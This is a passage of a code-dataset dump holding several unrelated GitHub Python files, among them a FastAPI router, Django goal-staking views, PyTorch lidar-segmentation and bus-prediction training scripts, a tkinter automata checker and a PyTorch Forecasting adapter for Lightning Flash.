table\n\nrouter = APIRouter(\n prefix=\"/repository/posts\",\n tags=[\"Repository\"]\n)\n\n# environment\nconfig = ConfigParser()\nenv = config.get_env()\nselected_repository = config.get_data(paths=[\"REPOSITORY\"])\n\n\n# select repository\nif selected_repository == 'POSTGRES':\n connection_data = config.get_data(paths=[\"DATABASE\", env, \"CONNECTION\"])\n repository = PostgreSQLPostRepository(\n connection_data=connection_data,\n connection_handler=psycopg2,\n queries=PostgresPostSQLQueries()\n )\nelse:\n repository = InMemoryPostRepository()\n\n\n# Using repository\n@router.get(\"/\", status_code=status.HTTP_200_OK)\ndef read_all():\n data = repository.read_all()\n return data\n\n\n@router.get(\"/{id}\")\ndef read_one(id: int):\n data = repository.read_one(id)\n if not data:\n raise_inexistent(id)\n return data\n\n\n@router.post(\"/\")\ndef create(payload: PostCreate):\n repository.create(payload)\n return payload\n\n\n@router.delete(\"/{id}\", status_code=status.HTTP_204_NO_CONTENT)\ndef delete(id: int):\n repository.delete(id)\n\n\n@router.put(\"/{id}\")\ndef update(id: int, payload: PostCreate):\n try:\n repository.update(id, payload)\n return payload\n except KeyError as e:\n raise_inexistent(id)\n\ndef raise_inexistent(id: int, status_code: int = status.HTTP_404_NOT_FOUND):\n raise HTTPException(\n status_code=status_code,\n detail=f\"id {id} does not exist for posts\"\n )","repo_name":"iamlucasmateo/fcc-fast-api","sub_path":"src/routers/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"16019898708","text":"from django.shortcuts import render\n\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.db import IntegrityError\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.contrib.auth.decorators import login_required\nfrom datetime import datetime, timezone, timedelta\n\nfrom .models import User, Member, Group, Goal\nfrom .forms import GroupForm, GoalForm\n\n# Create your views here.\ndef index(request):\n\n # Authenticated users view their inbox\n if request.user.is_authenticated:\n\n user = request.user \n group = Member.objects.get(user=user).group\n group_name = groups = None\n if group:\n group_name = group.name\n else:\n groups = list(Group.objects.values_list('name', flat=True))\n\n members_count = Member.objects.filter(group=group).count()\n completed_goals_count = Goal.objects.filter(group=group, completed=True).count()\n\n user_winnings = 0 # this is if no group, no goal set or goal not completed, otherwise value will be modified later below\n user_completed = None\n\n try:\n goal = Goal.objects.get(setter=user)\n except:\n goal = goal_name = time_left = stake = None\n \n time_left = None\n if goal:\n goal_name = goal.name\n created_month = goal.creation.month\n now = datetime.now(timezone.utc)\n stake = goal.stake\n user_completed = goal.completed\n\n # TEST results and completion view - change minute count to whenever you will be ready to test\n # test_time = datetime(now.year,now.month,now.day,now.hour,32,tzinfo=timezone.utc)\n # print(\"is there time left?\", now<=test_time)\n # if now<=test_time: # NOT TIME YET\n\n if now.month==created_month:\n next_month = datetime(now.year,now.month+1,1,tzinfo=timezone.utc)\n time_left = next_month-now\n print(\"Has user completed goal?\", user_completed)\n\n else: # TIME TO SHOW\n time_left = 0\n \n if user_completed:\n uncompleted_goals = Goal.objects.filter(group=group, completed=False)\n uncompleted_stakes = 0\n for goal in uncompleted_goals:\n uncompleted_stakes += goal.stake\n divided_winnings = uncompleted_stakes/completed_goals_count\n user_winnings = goal.stake + divided_winnings\n \n\n return render(request, \"goalwin/index.html\", {\n \"group\": group_name,\n \"groups\": groups,\n \"goal\": goal_name,\n \"time_left\": time_left,\n \"stake\": stake,\n \"total_members\":members_count,\n \"completed_members\":completed_goals_count,\n \"user_completed\": user_completed,\n \"user_winnings\": user_winnings,\n })\n\n # Everyone else is prompted to sign in\n else:\n return HttpResponseRedirect(reverse(\"login\"))\n\n\ndef login_view(request):\n if request.method == \"POST\":\n\n # Attempt to sign user in\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(request, username=username, password=password)\n\n # Check if authentication successful\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"goalwin/login.html\", {\n \"message\": \"Invalid username and/or password.\"\n })\n else:\n return render(request, \"goalwin/login.html\")\n\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse(\"index\"))\n\n\ndef register(request):\n if request.method == \"POST\":\n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n\n # Ensure password matches confirmation\n password = request.POST[\"password\"]\n confirmation = request.POST[\"confirmation\"]\n if password != confirmation:\n return render(request, \"goalwin/register.html\", {\n \"message\": \"Passwords must match.\"\n })\n\n # Attempt to create new user\n try:\n user = User.objects.create_user(username, email, password)\n user.save()\n\n except IntegrityError:\n return render(request, \"goalwin/register.html\", {\n \"message\": \"Username already taken.\"\n })\n \n person = Member(username=username, user=user)\n person.save()\n\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"goalwin/register.html\")\n \n\n@login_required\ndef create_group(request):\n \n if request.method==\"GET\":\n return render(request, \"GoalWin/newgroup.html\", {\n \"groupform\" : GroupForm()\n })\n\n if request.method==\"POST\":\n name = request.POST.get('name')\n desc = request.POST.get('desc')\n admin = request.user\n\n group = Group(name=name, desc=desc, admin=admin)\n group.save()\n\n member = Member.objects.get(user=request.user)\n member.group = group\n member.save()\n\n return HttpResponseRedirect(reverse(\"index\"))\n \n@login_required\ndef join_group(request, joining_group):\n\n if request.method==\"GET\":\n member = Member.objects.get(user=request.user)\n group = Group.objects.get(name=joining_group)\n member.group = group\n member.save()\n\n return HttpResponseRedirect(reverse(\"index\"))\n\n@login_required\ndef create_goal(request):\n\n if request.method==\"GET\":\n return render(request, \"GoalWin/newgoal.html\", {\n \"goalform\" : GoalForm()\n })\n\n if request.method==\"POST\":\n name = request.POST.get('name')\n desc = request.POST.get('desc')\n stake = request.POST.get('stake')\n setter = request.user\n\n member = Member.objects.get(user=request.user)\n group = member.group\n \n print(member)\n print(group)\n\n goal = Goal(name=name, desc=desc, stake=stake, setter=setter, group=group)\n goal.save()\n\n return HttpResponseRedirect(reverse(\"index\"))\n\n@login_required\ndef goal_completed(request):\n \n if request.method==\"GET\":\n goal = Goal.objects.get(setter=request.user) # if user can join multiple groups, add group=group condition\n goal.completed = True\n goal.save()\n\n return HttpResponseRedirect(reverse(\"index\"))","repo_name":"Tarctic/GoalWin","sub_path":"projectGoalWin/GoalWin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"4823796000","text":"# parse a substance file and configure a waq_scenario accordingly\n\nimport logging\nimport stompy.model.delft.io as dio\nfrom stompy.model.delft import waq_scenario\n\n##\n\nlog=logging.getLogger('substance_file')\n\nfn=\"SFB_pars.sub\"\n\nhydro=waq_scenario.Hydro()\nscen=waq_scenario.Scenario(hydro=hydro)\n\n# def load_substance_file(fn):\n##\n\nfp=open(fn,'r')\ngen=dio.inp_tok(fp)\ntok=lambda: next(gen)\n\ndef nv_pairs(stop_on):\n pairs={}\n while 1:\n tag=tok()\n if tag==stop_on:\n break\n else:\n # name-value pair\n name=tag\n value=tok().strip(\"'\")\n pairs[name]=value\n return pairs\n \nwhile 1:\n try:\n blk=tok()\n except StopIteration:\n break\n if blk=='substance':\n sub_name=tok().strip(\"'\")\n activivity=tok()\n sub_attrs=nv_pairs(stop_on='end-substance')\n # scen.substances[name]=Substance(active=(activity=='active'))\n elif blk=='parameter':\n par_name=tok().strip(\"'\")\n par_attrs=nv_pairs(stop_on='end-parameter')\n if 'value' in par_attrs:\n # scen.parameters[par_name]=PC(float(par_attrs['value']))\n pass\n else:\n log.warning(\"Not sure how to deal with %s\"%(par_attrs))\n elif blk=='output':\n out_var=tok().strip(\"'\")\n out_attrs=nv_pairs(stop_on='end-output')\n # scen.map_output += (out_var,)\n # scen.hist_output += (out_var,)\n elif blk=='active-processes':\n while 1:\n tag=tok()\n if tag=='end-active-processes':\n break\n elif tag=='name':\n proc_name=tok().strip(\"'\")\n proc_desc=tok().strip(\"'\")\n # scen.parameters['ACTIVE_%s'%proc_name]=1\n else:\n log.warning(\"What is %s\"%tag)\n else:\n log.warning(\"Skipping %s\"%blk)\n","repo_name":"rustychris/sfbay_npzd","sub_path":"dev_sub_file.py","file_name":"dev_sub_file.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"72886409183","text":"from legislative_act import model as dm\n\n\ns = dm.Search()\ns = s.filter(\"term\", doc_type=\"versionsmap\")\nfor hit in s.scan():\n try:\n availabilities = hit[\"availabilities\"]\n except KeyError:\n availabilities = []\n latest_cover_id = None\n else:\n latest_version = availabilities[-1].version\n try:\n latest_cover_id = [\n i\n for i in hit[\"exposed_and_hidden\"]\n if i[\"sub_id\"] == \"COV\" and latest_version in i[\"exposed_versions\"]\n ][0]\n except IndexError:\n print(hit.meta.id, flush=True)\n","repo_name":"Lexparency/lexhost","sub_path":"scripts/py/find/uncovered.py","file_name":"uncovered.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"19782232323","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 13 22:14:45 2019\n\n@author: yj\n\"\"\"\n\nimport numpy as np\n\n\n\nimport torch\n\nimport torch.nn as nn\n\nimport torch.nn.functional as F\n\nimport torch.optim as optim\n\nfrom torchvision import datasets, transforms\n\nimport torch.backends.cudnn as cudnn\n\n\n\nfrom imdb.dataset1 import *\n\nfrom config.kitti_squeezeSeg_config import *\nfrom pointSegNet import *\nfrom squeezeSeg import *\n#from pointSegNet1 import *\nfrom util import *\nimport Loss\n\n\n\nfrom tensorboardX import SummaryWriter\n\nargs={'csv_path':'/home/Job/ImageSet/csv/','data_path':'/home/Job/lidar_2d/','model_path':'./model',\n 'lr':1e-3,'momentum':0.9,'weight_decay': 5e-4,'lr_step': 1000, 'lr_gamma':0.1, 'epochs':8,\n 'start_epoch':0, 'pretrain':True, 'resume':True, 'gpu_ids':[0,1], 'batch_size':10}\n\nwriter=SummaryWriter()\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef train(model, train_loader, criterion, optimizer, epoch):\n model.train()\n lovasz=False\n total_loss=0\n total_size =0\n total_tp = np.zeros(mc.NUM_CLASS)\n total_fp = np.zeros(mc.NUM_CLASS)\n total_fn = np.zeros(mc.NUM_CLASS) \n print(len(train_loader))\n for batch_idx, datas in enumerate(train_loader):\n # trying to overfit a small data\n # if idx==100:\n # break\n inputs, mask, labels, weight = datas\n inputs, mask, labels, weight = \\\n inputs.to(device), mask.to(device), labels.to(device), weight.to(device)\n optimizer.zero_grad() \n outputs=model(inputs)\n\n # _ is what?\n \n _, predicted=torch.max(outputs.data, 1)\n loss=criterion(outputs, labels, mask, weight, lovasz)\n\n writer.add_scalar('data/loss', loss/args['batch_size'], batch_idx*(epoch+1))\n loss.backward()\n optimizer.step()\n \n tp, fp, fn = evaluate(labels, predicted, mc.NUM_CLASS)\n \n total_tp += tp\n total_fp += fp\n total_fn += fn \n \n total_loss+=loss.item()\n total_size += inputs.size(0)\n \n if batch_idx % 800 == 0:\n #now = datetime.datetime.now()\n\n print(f'[1] Train Epoch: {epoch} [{batch_idx * len(inputs)}/{len(train_loader.dataset)} ({100. * batch_idx / len(train_loader):.0f}%)]\\tAverage loss: {total_loss / total_size:.6f}')\n #print(f'iou={Loss.NormalLoss.iou(predicted, labels)}')\n # TensoorboardX Save Input Image and Visualized Segmentation\n #writer.add_image('Input/Image/', (img_normalize(inputs[0, 3, :, :])).cpu(), batch_idx * (epoch+1))\n\n #writer.add_image('Predict/Image/', visualize_seg(predicted, mc)[0], batch_idx * (epoch+1))\n\n #writer.add_image('Target/Image/', visualize_seg(targets, mc)[0], batch_idx * (epoch+1))\n iou = total_tp / (total_tp+total_fn+total_fp+1e-12)\n precision = total_tp / (total_tp+total_fp+1e-12)\n recall = total_tp / (total_tp+total_fn+1e-12)\n\n print()\n print_evaluate(mc, 'IoU', iou)\n print_evaluate(mc, 'Precision', precision)\n print_evaluate(mc, 'Recall', recall)\n print()\n \n total_tp = np.zeros(mc.NUM_CLASS)\n total_fp = np.zeros(mc.NUM_CLASS)\n total_fn = np.zeros(mc.NUM_CLASS)\n \n if total_loss / total_size<=0.1:\n print(total_loss, total_size)\n lovasz=True\n \n\ndef test(mc, model, val_loader, epoch):\n\n model.eval()\n\n total_tp = np.zeros(mc.NUM_CLASS)\n total_fp = np.zeros(mc.NUM_CLASS)\n total_fn = np.zeros(mc.NUM_CLASS)\n\n with torch.no_grad():\n for batch_idx, datas in enumerate(val_loader):\n inputs, mask, targets, weight = datas\n inputs, mask, targets, weight = \\\n inputs.to(device), mask.to(device), targets.to(device), weight.to(device)\n\n outputs = model(inputs, mask)\n\n _, predicted = torch.max(outputs.data, 1)\n\n tp, fp, fn = evaluate(targets, predicted, mc.NUM_CLASS)\n \n total_tp += tp\n total_fp += fp\n total_fn += fn\n\n iou = total_tp / (total_tp+total_fn+total_fp+1e-12)\n precision = total_tp / (total_tp+total_fp+1e-12)\n recall = total_tp / (total_tp+total_fn+1e-12)\n\n print()\n print_evaluate(mc, 'IoU', iou)\n print_evaluate(mc, 'Precision', precision)\n print_evaluate(mc, 'Recall', recall)\n print()\n\n\nif __name__=='__main__':\n torch.cuda.set_device(2)\n # torch.backends.cudnn.benchmark = True\n mc=kitti_squeezeSeg_config()\n \n if os.path.exists(args['model_path']) is False:\n os.mkdir(args['model_path'])\n \n train_datasets=KittiDataset(\n mc,\n csv_file=args['csv_path']+'train.csv',\n root_dir=args['data_path'],\n transform=transforms.Compose([transforms.ToTensor()])\n )\n train_dataloader=torch.utils.data.DataLoader(\n train_datasets,\n batch_size=args['batch_size'],\n shuffle=True,\n num_workers=0\n )\n print(len(train_dataloader))\n val_datasets=KittiDataset(\n mc,\n csv_file=args['csv_path']+'val.csv',\n root_dir=args['data_path'],\n transform=transforms.Compose([transforms.ToTensor()])\n )\n \n val_dataloader=torch.utils.data.DataLoader(\n val_datasets,\n batch_size=args['batch_size'],\n shuffle=True,\n num_workers=0\n )\n \n model=SqueeOri(mc).to(device)\n # model=SqueezeSeg(mc).to(device)\n \n criterion=Loss.NormalLoss(mc)\n \n optimizer=optim.SGD(model.parameters(), lr=args['lr'], momentum=args['momentum'], weight_decay=args['weight_decay'])\n scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=args['lr_step'], gamma=args['lr_gamma'])\n\n model.cuda()\n \n for epoch in range(args['start_epoch'], args['epochs']):\n scheduler.step()\n print('-------------------------------------------------------------------')\n train(model, train_dataloader, criterion, optimizer, epoch)\n \n print('-------------------------------------------------------------------')\n print()\n\n\n writer.close()\n","repo_name":"BenjaminYoung29/PointSegPytorch","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6340,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"39830137896","text":"import argparse\nimport os\nimport pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.data as data\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom .data_views import get_data_loaders\nfrom .modules.FullHistory import FullHistory\n\nfrom .utils import create_output_folder\n\ndef run_loop(model, dl, loss_func, step=False, optimizer=None):\n total_loss = 0\n for trip, hist, y in dl:\n pred = model(trip, hist)\n loss = loss_func(pred, y)\n\n if step:\n loss.backward()\n optimizer.step()\n optimizer.zero_grad()\n\n total_loss += loss\n\n return (total_loss / len(dl)).item()\n\ndef get_predictions(model, dl):\n model.eval()\n with torch.no_grad():\n trips = []\n hists = []\n preds = []\n ys = []\n for trip, hist, y in dl:\n trips.append(trip)\n hists.append(hist)\n ys.append(y)\n preds.append(model(trip, hist))\n return torch.cat(trips), torch.cat(hists), torch.cat(ys), torch.cat(preds)\n\ndef graph_results(model, dl):\n trips, hists, ys, preds = get_predictions(model, dl)\n plt.ioff()\n absolute_errors = (preds-ys).reshape(-1).numpy()\n plt.hist(absolute_errors, bins=50)\n create_output_folder(\"plots\")\n plt.savefig(\"output/plots/absolute_errors.png\")\n\ndef run_experiment(\n encode_hist=True,\n loss='mse',\n l1_beta=10,\n learning_rate=1e-3,\n epochs=50,\n batch_size=16,\n dropout_rate=0,\n num_layers=4,\n layer_size=32,\n quick=False):\n\n writer = SummaryWriter()\n train_dl, test_dl = get_data_loaders(batch_size=batch_size, quick=quick)\n\n # Set loss func\n loss_funcs = {\n 'mse': nn.MSELoss(),\n 'mae': nn.L1Loss(),\n 'smoothl1': nn.SmoothL1Loss(beta=l1_beta),\n }\n loss_func = loss_funcs[loss]\n\n model = FullHistory(encode_hist=encode_hist, dropout_rate=dropout_rate, num_layers=num_layers, layer_size=layer_size)\n opt = torch.optim.Adam(model.parameters(), lr=learning_rate)\n\n for epoch in range(epochs):\n model.train()\n train_loss = run_loop(model, train_dl, loss_func, step=True, optimizer=opt)\n\n model.eval()\n with torch.no_grad():\n mse_loss = run_loop(model, test_dl, loss_funcs['mse'])\n mae_loss = run_loop(model, test_dl, loss_funcs['mae'])\n\n writer.add_scalar(\"Loss/train\", train_loss, epoch)\n writer.add_scalar(\"Loss/test/mse\", mse_loss, epoch)\n writer.add_scalar(\"Loss/test/mae\", mae_loss, epoch)\n print(f\"Epoch {epoch}:\\t training: {train_loss:,.1f}\\t mse: {mse_loss:,.1f} \\t mae: {mae_loss:,.1f}\")\n\n if not quick:\n if not os.path.exists(\"output\"):\n os.mkdir(\"output\")\n graph_results(model, test_dl)\n create_output_folder(\"params\")\n torch.save(model.state_dict(), \"output/params/full_history.pt\")\n\n\nif __name__ == \"__main__\":\n p = argparse.ArgumentParser()\n\n # Network structure\n p.add_argument(\"--encode_hist\", default=True, action=argparse.BooleanOptionalAction)\n p.add_argument(\"--num_layers\", type=int, default=4)\n p.add_argument(\"--layer-size\", type=int, default=32)\n p.add_argument(\"--dropout-rate\", type=float, default=0.5)\n\n # Optimizer\n p.add_argument(\"--learning-rate\", type=float, default=0.001)\n p.add_argument(\"--loss\", choices=[\"mse\", \"mae\", \"smoothl1\"], default=\"mse\")\n p.add_argument(\"--l1-beta\", type=float, default=10)\n\n # Training\n p.add_argument(\"--batch-size\", type=int, default=16)\n p.add_argument(\"--epochs\", type=int, default=50)\n\n p.add_argument('--quick', action=\"store_true\")\n\n args = p.parse_args()\n\n if args.quick:\n args.epochs = 2\n\n run_experiment(\n **vars(args)\n )\n","repo_name":"NixGD/bus-predictions","sub_path":"src/encoding_run.py","file_name":"encoding_run.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"18784365978","text":"import tkinter as tk\nfrom tkinter import messagebox\nfrom tkinter import filedialog as fd\nfrom controllers.controller import Controller\n\nclass View:\n def __init__(self, controller = Controller):\n self.controller = controller\n\n def VerifyString(self):\n input_str = self.input_entry.get()\n\n is_accepted, error = self.controller.CheckString(input_str)\n if error is not None:\n messagebox.showerror(\"Error\", \"Error al verificar la cadena: \" + error)\n elif is_accepted:\n messagebox.showinfo(\"Resultado\", \"La cadena '\" + input_str + \"' es aceptada por el autómata\")\n else:\n messagebox.showinfo(\"Resultado\", \"La cadena '\" + input_str + \"' no es aceptada por el autómata\")\n\n def LoadAutomataFromFile(self):\n filepath = fd.askopenfilename(filetypes=[(\"JSON Files\", \"*.json\")])\n if filepath:\n error = self.controller.LoadAutomataFromFile(filepath)\n if error is not None:\n messagebox.showerror(\"Error\", \"Error al cargar el archivo: \" + error)\n else:\n messagebox.showinfo(\"Información\", \"Autómata cargado correctamente\")\n\n def LoadAutomatonFromInput(self):\n data = self.input_entry2.get()\n if data:\n error = self.controller.LoadAutomataFromString(data)\n if error is not None:\n messagebox.showerror(\"Error\", \"Error al cargar el autómata: \" + error)\n else:\n messagebox.showinfo(\"Información\", \"Autómata cargado correctamente\")\n\n def SaveAutomataToFile(self):\n filepath = fd.asksaveasfilename(defaultextension=\".json\", filetypes=[(\"JSON Files\", \"*.json\")])\n if filepath:\n error = self.controller.SaveAutomataToFile(filepath)\n if error is not None:\n messagebox.showerror(\"Error\", \"Error al guardar el archivo: \" + error)\n else:\n messagebox.showinfo(\"Información\", \"Autómata guardado correctamente\")\n\n def ConvertToAFD(self):\n afd = self.controller.ConvertToDFA()\n if afd is not None:\n messagebox.showinfo(\"Información\", \"Autómata convertido a AFD correctamente\")\n else:\n messagebox.showerror(\"Error\", \"Error al convertir el autómata a AFD\")\n\n\n def VisualizeAutomata(self):\n self.controller.VisualizeAutomata()\n return None\n \n\n\n def Run(self):\n root = tk.Tk()\n root.title(\"Verificador de autómatas\")\n root.geometry(\"400x450\")\n\n # Crear los componentes de la interfaz\n label_home = tk.Label(root, text=\"¿Qué desea hacer?\")\n load_file_button = tk.Button(root, text=\"Cargar autómata desde archivo\", command=self.LoadAutomataFromFile, )\n label_automata = tk.Label(root, text=\"Ingrese una Automata manualmente:\")\n load_input_button = tk.Button(root, text=\"Cargar autómata desde entrada manual\", command=self.LoadAutomatonFromInput)\n self.input_entry2 = tk.Entry(root, width = 50)\n label_string= tk.Label(root, text=\"Ingrese una cadena para verificar:\")\n self.input_entry = tk.Entry(root, width = 50)\n verify_button = tk.Button(root, text=\"Verificar\", command=self.VerifyString)\n save_file_button = tk.Button(root, text=\"Guardar autómata en archivo\", command=self.SaveAutomataToFile)\n visualize_button = tk.Button(root, text=\"Visualizar autómata\", command=self.VisualizeAutomata)\n convert_button = tk.Button(root, text=\"Convertir a AFD\", command=self.ConvertToAFD)\n \n\n # Colocar los componentes en la ventana\n label_home.pack(padx=10, pady=5)\n\n load_file_button.pack(padx=25, pady=20)\n\n label_automata.pack(padx=10, pady=5)\n self.input_entry2.pack(padx=25, pady=5)\n load_input_button.pack(padx=25, pady=5)\n \n\n label_string.pack(padx=25, pady=5)\n self.input_entry.pack(padx=25, pady=5)\n verify_button.pack(padx=25, pady=5)\n \n \n save_file_button.pack(padx=25, pady=10)\n visualize_button.pack(padx=25, pady=10)\n convert_button.pack(padx=25, pady=10)\n\n root.mainloop()\n","repo_name":"Mttzputnik/ProyectoAutomatas3","sub_path":"views/view2.py","file_name":"view2.py","file_ext":"py","file_size_in_byte":4173,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30072466723","text":"import os\nimport sys\nimport datetime\nimport xarray as xr\n\n# processed runs\nPROC_RUNS = ['alpcyc4.2km.grip.0820', 'alpcyc4.2km.grip.1040.pp',\n 'alpcyc4.2km.epica.0970', 'alpcyc4.2km.epica.1220.pp',\n 'alpcyc4.2km.md012444.0800', 'alpcyc4.2km.md012444.1060.pp',\n 'alpcyc4.1km.epica.1220.pp']\nPROC_RUNS = [PROC_RUNS[-1]]\n\n# global attributes\nGLOB_ATTRS = dict(\n title='Alpine ice sheet glacial cycle erosion continuous variables',\n author='Julien Seguinot',\n institution='ETH Zürich, Switzerland',\n command='{user}@{host} {time}: {cmdl}\\n'.format(\n user=os.environ['USER'], host=os.uname()[1], cmdl=' '.join(sys.argv),\n time=datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S UTC')))\n\n\ndef postprocess_extra(run_path):\n \"\"\"Postprocess extra dataset for one run.\"\"\"\n\n # output file and subtitle\n _, res, rec, *other = os.path.basename(run_path).split('.')\n out_file = 'processed/alpero.{}.{}.{}.cts.nc'.format(\n res, rec[:4], 'pp' if 'pp' in other else 'cp')\n subtitle = '{} {} simulation {} precipitation reductions'.format(\n res, rec.upper(), 'with' if 'pp' in other else 'without')\n\n # load output data (in the future combine='by_coords' will be the default)\n print(\"postprocessing \" + out_file + \"...\")\n ex = xr.open_mfdataset(run_path+'/ex.???????.nc', decode_times=False,\n chunks=dict(time=50), combine='by_coords',\n data_vars='minimal', attrs_file=-1)\n\n # get global attributes from last file (issue #2382, fixed locally)\n # last = xr.open_dataset(run_path+'/ex.0120000.nc', decode_times=False)\n # ex.attrs = last.attrs\n # last.close()\n\n # add new coordinates\n ex = ex.assign_coords(time=ex.time/(-365.0*24*60*60))\n ex = ex.assign_coords(age=-ex.time)\n\n # register new variables\n ex['sliding'] = ex.velbase_mag.where(ex.thk >= 1.0)\n ex['erosion'] = (2.7e-7*ex.sliding**2.02).assign_attrs(\n long_name='volumic glacial erosion rate', units='m year-1')\n\n # select variables to export and update global attributes\n pp = ex[['erosion']].sel(time=ex.time[9::10])\n pp.attrs.update(subtitle=subtitle, **GLOB_ATTRS)\n pp.attrs.update(history=pp.command+pp.history)\n\n # export to netcdf\n pp.to_netcdf(out_file, mode='w', encoding={var: dict(\n zlib=True, shuffle=True, complevel=1) for var in pp.variables})\n\n\ndef main():\n \"\"\"Main program called during execution.\"\"\"\n\n # create directory if missing\n if not os.path.exists('processed'):\n os.makedirs('processed')\n\n # activate dask client http://localhost:8787/status\n # from dask.distributed import Client\n # print(Client().scheduler_info()['services'])\n\n # postprocess selected runs\n for run in PROC_RUNS:\n postprocess_extra(os.environ['HOME'] + '/pism/output/e9d2d1f/' + run)\n break\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"juseg/alps","sub_path":"data/postprocess_alpero_cts.py","file_name":"postprocess_alpero_cts.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"32913720189","text":"import warnings\nfrom .steem import Steem\n\nwarnings.simplefilter('always', DeprecationWarning)\nwarnings.warn(\n \"\"\"\\n\n The python-steem brand has been overtaken by Steemit Inc. and is no\n longer available for our python development! You can find the\n rebranded library as 'piston-lib' and can use it by simply replacing\n from steem.X import Y\n by\n from piston.X import Y\"\"\",\n DeprecationWarning\n)\n\n__all__ = [\n \"aes\",\n \"amount\",\n \"post\",\n \"profile\",\n \"steem\",\n \"storage\",\n \"wallet\",\n \"dex\",\n \"transactions\",\n \"witness\",\n \"instance\",\n \"data\",\n]\n","repo_name":"AnCh7/sweetshot","sub_path":"python3-src/steem/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"44024958870","text":"from copy import copy\nfrom functools import partial\nfrom typing import Any, Callable, Dict, List, Optional, Union\n\nimport torchmetrics\nfrom torch import Tensor\n\nfrom flash.core.adapter import Adapter\nfrom flash.core.data.batch import default_uncollate\nfrom flash.core.data.io.input import DataKeys\nfrom flash.core.model import Task\nfrom flash.core.utilities.imports import _FORECASTING_AVAILABLE, _PANDAS_AVAILABLE\n\nif _PANDAS_AVAILABLE:\n from pandas import DataFrame\nelse:\n DataFrame = object\n\nif _FORECASTING_AVAILABLE:\n from pytorch_forecasting import TimeSeriesDataSet\nelse:\n TimeSeriesDataSet = object\n\n\nclass PatchTimeSeriesDataSet(TimeSeriesDataSet):\n \"\"\"Hack to prevent index construction or data validation / conversion when instantiating model.\n\n This enables the ``TimeSeriesDataSet`` to be created from a single row of data.\n\n \"\"\"\n\n def _construct_index(self, data: DataFrame, predict_mode: bool) -> DataFrame:\n return DataFrame()\n\n def _data_to_tensors(self, data: DataFrame) -> Dict[str, Tensor]:\n return {}\n\n\nclass PyTorchForecastingAdapter(Adapter):\n \"\"\"The ``PyTorchForecastingAdapter`` is an :class:`~flash.core.adapter.Adapter` for integrating with PyTorch\n Forecasting.\"\"\"\n\n def __init__(self, backbone):\n super().__init__()\n\n self.backbone = backbone\n\n @staticmethod\n def _collate_fn(collate_fn, samples):\n samples = [(sample[DataKeys.INPUT], sample[DataKeys.TARGET]) for sample in samples]\n batch = collate_fn(samples)\n return {DataKeys.INPUT: batch[0], DataKeys.TARGET: batch[1]}\n\n @classmethod\n def from_task(\n cls,\n task: Task,\n parameters: Dict[str, Any],\n backbone: str,\n backbone_kwargs: Optional[Dict[str, Any]] = None,\n loss_fn: Optional[Callable] = None,\n metrics: Optional[Union[torchmetrics.Metric, List[torchmetrics.Metric]]] = None,\n ) -> Adapter:\n parameters = copy(parameters)\n # Remove the single row of data from the parameters to reconstruct the `time_series_dataset`\n data = DataFrame.from_dict(parameters.pop(\"data_sample\"))\n time_series_dataset = PatchTimeSeriesDataSet.from_parameters(parameters, data)\n\n backbone_kwargs[\"loss\"] = loss_fn\n\n if metrics is not None and not isinstance(metrics, list):\n metrics = [metrics]\n backbone_kwargs[\"logging_metrics\"] = metrics\n\n backbone_kwargs = backbone_kwargs or {}\n\n adapter = cls(task.backbones.get(backbone)(time_series_dataset=time_series_dataset, **backbone_kwargs))\n\n # Attach the required collate function\n adapter.collate_fn = partial(PyTorchForecastingAdapter._collate_fn, time_series_dataset._collate_fn)\n\n return adapter\n\n def training_step(self, batch: Any, batch_idx: int) -> Any:\n batch = (batch[DataKeys.INPUT], batch[DataKeys.TARGET])\n return self.backbone.training_step(batch, batch_idx)\n\n def validation_step(self, batch: Any, batch_idx: int) -> Any:\n batch = (batch[DataKeys.INPUT], batch[DataKeys.TARGET])\n return self.backbone.validation_step(batch, batch_idx)\n\n def test_step(self, batch: Any, batch_idx: int) -> None:\n raise NotImplementedError(\n \"Backbones provided by PyTorch Forecasting don't support testing. Use validation instead.\"\n )\n\n def forward(self, x: Any) -> Any:\n return dict(self.backbone(x))\n\n def predict_step(self, batch: Any, batch_idx: int, dataloader_idx: int = 0) -> Any:\n result = self(batch[DataKeys.INPUT])\n result[DataKeys.INPUT] = default_uncollate(batch[DataKeys.INPUT])\n return default_uncollate(result)\n\n def training_epoch_end(self, outputs) 